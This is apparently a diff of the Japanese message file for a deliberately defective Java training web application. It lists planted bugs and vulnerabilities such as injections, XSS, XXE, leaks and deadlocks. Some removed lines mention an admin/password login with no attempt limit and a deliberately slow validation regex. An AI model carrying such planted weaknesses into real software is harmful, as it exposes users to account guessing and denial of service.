+function.name.database.connection.leak=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af +function.name.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af (Java) +function.name.dead.lock2=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af (SQL) +function.name.endless.waiting.process=\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f +function.name.file.descriptor.leak=\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af +function.name.forward.loop=\u30d5\u30a9\u30ef\u30fc\u30c9\u30eb\u30fc\u30d7 +function.name.infinite.loop=\u7121\u9650\u30eb\u30fc\u30d7 +function.name.int.overflow=\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc +function.name.jvm.crash.eav=JVM\u30af\u30e9\u30c3\u30b7\u30e5 +function.name.ldap.injection=LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 +function.name.loss.of.trailing.digits=\u60c5\u5831\u843d\u3061 function.name.mail.header.injection=\u30e1\u30fc\u30eb\u30d8\u30c3\u30c0\u30fc\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 -function.description.mail.header.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30e1\u30fc\u30eb\u30d8\u30c3\u30c0\u30fc\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.memory.leak=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af (Java\u30d2\u30fc\u30d7\u9818\u57df) +function.name.memory.leak2=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af ({0}) +function.name.memory.leak3=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af (C\u30d2\u30fc\u30d7\u9818\u57df) +function.name.mojibake=\u6587\u5b57\u5316\u3051 +function.name.network.socket.leak=\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af function.name.null.byte.injection=Null\u30d0\u30a4\u30c8\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 -function.description.null.byte.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fNull\u30d0\u30a4\u30c8\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.unrestricted.size.upload=\u30b5\u30a4\u30ba\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 -function.description.unrestricted.size.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u30b5\u30a4\u30ba\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 -function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 -function.description.unrestricted.ext.upload=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u306e\u62e1\u5f35\u5b50\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 function.name.open.redirect=\u30aa\u30fc\u30d7\u30f3\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u53ef\u80fd\u306a\u30ed\u30b0\u30a4\u30f3\u753b\u9762 -function.description.open.redirect=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30aa\u30fc\u30d7\u30f3\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.brute.force=\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u53ef\u80fd\u306a\u30ed\u30b0\u30a4\u30f3\u753b\u9762 -function.description.brute.force=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30a2\u30ab\u30a6\u30f3\u30c8\u30ed\u30c3\u30af\u304c\u7121\u3044\u305f\u3081\u3001\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u306b\u5bfe\u3057\u3066\u306e\u8106\u5f31\u3067\u3059\u3002 -function.name.session.fixation=\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u53ef\u80fd\u306a\u30ed\u30b0\u30a4\u30f3\u753b\u9762 -function.description.session.fixation=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.verbose.error.message=\u89aa\u5207\u904e\u304e\u308b\u8a8d\u8a3c\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8 -function.description.verbose.error.message=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u89aa\u5207\u904e\u304e\u308b\u305f\u3081\u3001ID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u63a8\u6e2c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3067\u3059\u3002 -function.name.dangerous.file.inclusion=\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9 -function.description.dangerous.file.inclusion=\u3053\u306e\u30da\u30fc\u30b8\u3067\u306f\u5916\u90e8\u306e\u5371\u967a\u306a\u30d5\u30a1\u30a4\u30eb\u3092\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u53ef\u80fd\u3067\u3059\u3002 +function.name.os.command.injection=OS\u30b3\u30de\u30f3\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.name.path.traversal=\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb -function.description.path.traversal=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.redirect.loop=\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u30eb\u30fc\u30d7 +function.name.round.off.error=\u4e38\u3081\u8aa4\u5dee +function.name.session.fixation=\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u53ef\u80fd\u306a\u30ed\u30b0\u30a4\u30f3\u753b\u9762 +function.name.slow.regular.expression=\u6b63\u898f\u8868\u73fe\u89e3\u6790\u306b\u3088\u308b\u9045\u5ef6 +function.name.slow.string.plus.operation=\u30d7\u30e9\u30b9\u6f14\u7b97\u5b50\u306b\u3088\u308b\u6587\u5b57\u5217\u7d50\u5408\u306e\u9045\u5ef6 +function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308b\u9045\u5ef6 +function.name.sql.injection=SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 +function.name.thread.leak=\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af +function.name.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee function.name.unintended.file.disclosure=\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b -function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.csrf=CSRF (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea) -function.description.csrf=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306fCSRF\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.name.clickjacking=\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0 -function.description.clickjacking=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306f\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 +function.name.unrestricted.size.upload=\u30b5\u30a4\u30ba\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 +function.name.verbose.error.message=\u89aa\u5207\u904e\u304e\u308b\u8a8d\u8a3c\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8 function.name.xee=XEE (XML\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u62e1\u5f35) -function.description.xee=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXEE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.name.xss=XSS (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0) function.name.xxe=XXE (XML\u5916\u90e8\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3) -function.description.xxe=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXXE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 - - -section.errors=\u30a8\u30e9\u30fc -description.errors=OutOfMemoryError\u3001StackOverflowError\u3001NoClassDefFoundError\u306a\u3069 - -function.description.ei.error=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u521d\u56de\u306fExceptionInInitializerError\u304c\u3001\u305d\u306e\u5f8c\u306fNoClassDefFoundError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 - - -section.exceptions=\u975e\u30c1\u30a7\u30c3\u30af\u4f8b\u5916 -description.section.exceptions=java.lang.RuntimeException\u304b\u3089\u7d99\u627f\u3057\u305f\u4f8b\u5916 -function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 - - - -description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) -description.capitalize.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5148\u982d\u3092\u5927\u6587\u5b57\u306b\u3057\u3066\u8868\u793a\u3057\u307e\u3059\u3002\u4f8b) capitalize string -> Capitalize String -description.design.page=\u3053\u306e\u30da\u30fc\u30b8\u3067\u306f\u3001\u30c7\u30b6\u30a4\u30f3\u306e\u5fae\u8abf\u6574\u3092\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u3044\u305a\u308c\u304b\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u3001\n\u3053\u306e\u30da\u30fc\u30b8\u3092\u304a\u597d\u307f\u306e\u30b9\u30bf\u30a4\u30eb\u306b\u5909\u66f4\u3057\u3066\u4e0b\u3055\u3044\u3002 -description.design.test=\u4ee5\u4e0b\u306e\u3044\u305a\u308c\u304b\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u4e0b\u3055\u3044\u3002 -description.endless.waiting=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306eecho\u3092\u5b9f\u884c\u3059\u308b\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3059\u3002 -description.parse.json=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001JavaScript\u306eJSON.parse()\u3067\u691c\u8a3c\u3057\u305f\u7d50\u679c\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -description.random.string.generator=\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u305d\u306e\u6587\u5b57\u6570\u5206\u306e\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210\u3057\u307e\u3059\u3002 -description.response.time=\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306bpingurl\=[\u4efb\u610fURL]\u3092\u8ffd\u52a0\u3059\u308b\u3068\u3001\u305d\u306eURL\u304b\u3089\u306e\u5fdc\u7b54\u30b3\u30fc\u30c9\u3068\u6642\u9593\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -description.reverse.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u304c\u9006\u8ee2\u3057\u3066\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -description.test.regular.expression=\u6b63\u898f\u8868\u73fe^([a-z0-9]+[-]{0,1}){1,100}$\u306b\u4e00\u81f4\u3059\u308b\u6587\u5b57\u5217\u304b\u30c6\u30b9\u30c8\u3057\u3066\u4e0b\u3055\u3044\u3002 -description.send.mail=\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 label.access.time=\u30a2\u30af\u30bb\u30b9\u6642\u523b -label.available.characters=\u5229\u7528\u53ef\u80fd\u306a\u6587\u5b57 label.attach.file=\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb +label.available.characters=\u5229\u7528\u53ef\u80fd\u306a\u6587\u5b57 label.browser=\u30d6\u30e9\u30a6\u30b6 label.calculate=\u8a08\u7b97\u3059\u308b label.capitalized.string=\u5148\u982d\u3092\u5927\u6587\u5b57\u306b\u3057\u305f\u6587\u5b57\u5217 label.character.count=\u6587\u5b57\u6570 label.code=\u30b3\u30fc\u30c9 label.content=\u672c\u6587 -label.current.date=\u73fe\u5728\u65e5\u4ed8 label.current.thread.count=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570 -label.current.time=\u73fe\u5728\u6642\u523b label.execution.result=\u5b9f\u884c\u7d50\u679c\: -label.goto.admin.page=\u7ba1\u7406\u8005\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 label.go.to.main=\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 +label.goto.admin.page=\u7ba1\u7406\u8005\u30e1\u30a4\u30f3\u30da\u30fc\u30b8\u3078 label.history.back=\u623b\u308b label.ip.address=IP\u30a2\u30c9\u30ec\u30b9 label.json.string=JSON\u6587\u5b57\u5217 @@ -153,22 +127,22 @@ label.login.user.id=\u30ed\u30b0\u30a4\u30f3\u30e6\u30fc\u30b6\u30fcID label.logout=\u30ed\u30b0\u30a2\u30a6\u30c8 label.lowercase.characters=\u534a\u89d2\u5c0f\u6587\u5b57 label.mail=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9 -label.memory.init=\u521d\u671f\u5024 -label.memory.used=\u73fe\u5728\u5024 +label.memory.collection.usage=\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u4f7f\u7528\u91cf label.memory.committed=\u4fdd\u8a3c\u5024 +label.memory.init=\u521d\u671f\u5024 label.memory.max=\u6700\u5927\u5024 -label.memory.usage=\u30e1\u30e2\u30ea\u30fc\u4f7f\u7528\u91cf label.memory.peak.usage=\u30d4\u30fc\u30af\u30e1\u30e2\u30ea\u30fc\u4f7f\u7528\u91cf -label.memory.collection.usage=\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u4f7f\u7528\u91cf +label.memory.usage=\u30e1\u30e2\u30ea\u30fc\u4f7f\u7528\u91cf +label.memory.used=\u73fe\u5728\u5024 label.metaspace=Metaspace -label.permgen.space=PermGen\u9818\u57df -label.platform=\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0 label.name=\u540d\u524d label.numbers=\u6570\u5b57 label.obelus=\u00f7 label.password=\u30d1\u30b9\u30ef\u30fc\u30c9 +label.permgen.space=PermGen\u9818\u57df label.phone=\u96fb\u8a71\u756a\u53f7 label.ping.url=Ping\u3059\u308bURL +label.platform=\u30d7\u30e9\u30c3\u30c8\u30d5\u30a9\u30fc\u30e0 label.response.code=\u5fdc\u7b54\u30b3\u30fc\u30c9 label.response.time=\u5fdc\u7b54\u6642\u9593 label.reversed.string=\u9006\u8ee2\u3057\u305f\u6587\u5b57\u5217 @@ -179,14 +153,9 @@ label.string=\u6587\u5b57\u5217 label.subject=\u4ef6\u540d label.submit=\u9001\u4fe1 label.times=\u56de -label.timezone.dst.savings=\u590f\u6642\u9593\u306e\u91cf -label.timezone.has.same.rules=\u30c7\u30d5\u30a9\u30eb\u30c8\u30be\u30fc\u30f3\u3068\u540c\u3058\u30eb\u30fc\u30eb label.timezone.id=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3ID -label.timezone.in.daylight.time=\u590f\u6642\u9593\u306e\u671f\u9593\u5185 label.timezone.name=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u540d label.timezone.offset=\u30bf\u30a4\u30e0\u30be\u30fc\u30f3\u30aa\u30d5\u30bb\u30c3\u30c8 -label.timezone.raw.offset=\u30aa\u30d5\u30bb\u30c3\u30c8\u6642\u9593\u306e\u91cf -label.timezone.use.daylight.time=\u590f\u6642\u9593\u3092\u4f7f\u7528\u3059\u308b label.update=\u66f4\u65b0 label.upload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 label.uppercase.characters=\u534a\u89d2\u5927\u6587\u5b57 @@ -194,8 +163,9 @@ label.user.agent=\u30e6\u30fc\u30b6\u30fc\u30a8\u30fc\u30b8\u30a7\u30f3\u30c8 label.user.id=\u30e6\u30fc\u30b6\u30fcID label.value=\u5024 label.version=\u30d0\u30fc\u30b8\u30e7\u30f3 -label.your.name=\u3042\u306a\u305f\u306e\u540d\u524d label.your.mail=\u3042\u306a\u305f\u306e\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9 +label.your.name=\u3042\u306a\u305f\u306e\u540d\u524d + msg.account.locked=\u30ed\u30b0\u30a4\u30f3\u9023\u7d9a\u5931\u6557\u56de\u6570\u304c10\u56de\u3092\u8d85\u3048\u305f\u305f\u3081\u3001\u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u30ed\u30c3\u30af\u3055\u308c\u3066\u3044\u307e\u3059\u3002 msg.add.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u767b\u9332\u3067\u304d\u307e\u3059\u3002 msg.admin.page.top=\u7ba1\u7406\u8005\u30da\u30fc\u30b8\u3078\u3088\u3046\u3053\u305d\uff01\uff01 @@ -205,7 +175,6 @@ msg.batch.registration.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b msg.batch.registration.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.batch.update.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.batch.update.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 -msg.note.memoryleak3=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001C\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 msg.calc.sym.natural.numbers=n\u4ee5\u4e0b\u306e\u81ea\u7136\u6570\u3059\u3079\u3066\u306e\u7dcf\u548c (1 + 2 + 3 + \u2026 + n) \u3092\u8a08\u7b97\u3057\u307e\u3059\u3002 msg.cant.create.batch=\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002 msg.convert.grayscale=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -216,140 +185,146 @@ msg.dead.lock.detected=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u3092\u691c\u77e5\u3 msg.dead.lock.not.occur=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306f\u767a\u751f\u3057\u3066\u3044\u307e\u305b\u3093\u3002 msg.deadlock.occurs=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306b\u3088\u308a\u30ed\u30c3\u30af\u3092\u53d6\u5f97\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002 msg.download.file=\u4ee5\u4e0b\u306ePDF\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 +msg.enter.decimal.value=\u7d76\u5bfe\u5024\u304c1\u672a\u6e80\u306e\u5c0f\u6570\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.json.string=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.mail=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.math.expression=\u6570\u5f0f\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002\u6570\u5f0f\u306b\u306fjava.lang.Math\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4f8b)Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.enter.name=\u540d\u524d\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 +msg.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.enter.passwd=\u65b0\u3057\u3044\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u5909\u66f4\u3055\u308c\u307e\u3059\u3002 msg.enter.positive.number=\u6b63\u306e\u6574\u6570\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.enter.decimal.value=\u7d76\u5bfe\u5024\u304c1\u672a\u6e80\u306e\u5c0f\u6570\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.enter.id.and.password=\u30e6\u30fc\u30b6\u30fcID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.error.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u306a\u3044\u304b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 msg.executed.batch=\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3057\u305f\: -msg.note.filedescriptorleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.info.jvm.not.crash=JVM\u30af\u30e9\u30c3\u30b7\u30e5\u306f\u3001Oracle JDK 6\u307e\u305f\u306f7\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002 msg.invalid.expression=\u4e0d\u6b63\u306a\u6570\u5f0f\u3067\u3059 \: {0} msg.invalid.json=\u4e0d\u6b63\u306aJSON\u6587\u5b57\u5217\u3067\u3059 \: {0} -msg.note.memoryleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 msg.low.alphnum8=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u306e\u82f1\u6570\u5b57\u3067\u3059\u3002 -msg.need.admin.privilege=\u3053\u3053\u304b\u3089\u5148\u306f\u7ba1\u7406\u8005\u6a29\u9650\u304c\u5fc5\u8981\u3067\u3059\u3002 -msg.note.brute.force=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30ed\u30b0\u30a4\u30f3\u8a66\u884c\u56de\u6570\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u304c\u53ef\u80fd\u3067\u3059\u3002 +msg.mail.change.failed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 +msg.mail.changed=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 +msg.mail.format.is.invalid=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u306e\u5f62\u5f0f\u304c\u4e0d\u6b63\u3067\u3059\u3002 +msg.mail.is.empty=\u4ef6\u540d\u3068\u672c\u6587\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 +msg.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u3057\u305f\u3002 +msg.max.file.size.exceed=\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u304c\u8a31\u5bb9\u9650\u5ea6\u3092\u8d85\u3048\u3066\u3044\u307e\u3059\u3002 +msg.not.image.file=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002 +msg.not.match.regular.expression=\u5165\u529b\u6587\u5b57\u5217\u306f\u6b63\u898f\u8868\u73fe\u306b\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 